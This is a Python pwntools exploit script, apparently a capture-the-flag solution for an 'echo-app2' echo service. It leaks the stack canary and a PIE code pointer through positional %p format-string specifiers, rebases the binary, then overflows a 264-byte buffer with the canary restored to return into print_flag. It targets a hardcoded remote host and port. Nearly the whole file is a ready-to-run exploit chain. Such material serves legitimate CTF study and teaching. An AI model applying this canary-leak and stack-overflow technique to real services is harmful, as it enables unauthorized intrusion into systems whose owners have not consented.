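#!/usr/bin/python3
"""Exploit for the ``echo-app2`` challenge.

Two-stage attack against a format-string echo service:

1. Leak the stack canary and a PIE code pointer with positional ``%p``
   specifiers, then recover the binary's load base from the leaked pointer.
2. Overflow the stack buffer, put the leaked canary back in place, and
   return into ``print_flag``.

Every offset below (the ``%39$p``/``%42$p`` argument indices, the
``0x15a1`` delta from the leaked pointer to the image base, the 264-byte
pad) is specific to this build of ``echo-app2``; re-derive them in a
debugger if the binary changes.

Runs against the remote service by default; ``python3 exploit.py LOCAL``
spawns ``./echo-app2`` locally instead (pwntools ``args``).
"""
import re

from pwn import *

context.binary = target = ELF("./echo-app2", checksec=False)

# Remote service endpoint (used unless LOCAL is given on the command line).
REMOTE_HOST = "54.85.45.101"
REMOTE_PORT = 8009

# Stack-frame layout constants for this build of echo-app2.
CANARY_FMT_INDEX = 39     # %p argument index that lands on the stack canary
CODE_PTR_FMT_INDEX = 42   # %p argument index that lands on a PIE code pointer
CODE_PTR_DELTA = 0x15A1   # distance from that code pointer to the image base
PAD_LEN = 264             # bytes from the start of the buffer to the canary

# Matches the "0x..." values that %p prints; used instead of a fixed-size
# read so a leak with leading zero nibbles (fewer hex digits) cannot
# desynchronise the stream.
_HEX_PTR = re.compile(r"0x[0-9a-fA-F]+")


def connect():
    """Open the target tube: a local process if ``LOCAL`` was given, else the remote service."""
    if args.LOCAL:
        return process()
    return remote(REMOTE_HOST, REMOTE_PORT)


def leak(r) -> tuple[int, int]:
    """Leak the canary and the binary base through the format-string bug.

    Sends ``%39$p.%42$p`` and parses one whole response line rather than a
    fixed 34-byte read, so the parse does not depend on both values printing
    with their maximum number of hex digits.

    Args:
        r: connected pwntools tube.

    Returns:
        ``(canary, base)`` where ``base`` is the PIE load address.

    Raises:
        ValueError: if the response does not contain two ``0x`` values
            (wrong binary, changed offsets, or a read timeout).
    """
    r.sendline(f"%{CANARY_FMT_INDEX}$p.%{CODE_PTR_FMT_INDEX}$p".encode())
    line = r.recvline(timeout=5).decode(errors="replace")
    values = _HEX_PTR.findall(line)
    if len(values) < 2:
        raise ValueError(f"unexpected leak response: {line!r}")

    canary = int(values[0], 16)
    base = int(values[1], 16) - CODE_PTR_DELTA

    # Sanity checks: glibc canaries carry a 0x00 low byte and a PIE base is
    # page-aligned. A mismatch almost always means a format index or the
    # delta is wrong for this binary; warn but still try, in case the
    # target differs.
    if canary & 0xFF:
        log.warning("canary %#x has a non-zero low byte - wrong %%p index?", canary)
    if base & 0xFFF:
        log.warning("base %#x is not page-aligned - wrong CODE_PTR_DELTA?", base)
    return canary, base


def build_payload(canary: int, ret_addr: int) -> bytes:
    """Build the overflow payload: pad, canary, one saved-register slot, return address.

    Args:
        canary: leaked stack canary, written back unchanged so the check passes.
        ret_addr: absolute address to return into.
    """
    return (
        b"A" * PAD_LEN
        + p64(canary)
        + p64(0)          # presumably the saved rbp slot; value not used before the ret
        + p64(ret_addr)
    )


def main() -> None:
    """Run the full leak-then-overflow chain and hand the shell to the user."""
    r = connect()

    canary, base = leak(r)
    log.info("canary: %#x", canary)
    # Rebase the ELF so its symbols (print_flag) resolve to runtime addresses.
    target.address = base
    log.info("base: %#x", base)

    r.sendline(build_payload(canary, target.sym.print_flag))
    r.interactive()


if __name__ == "__main__":
    main()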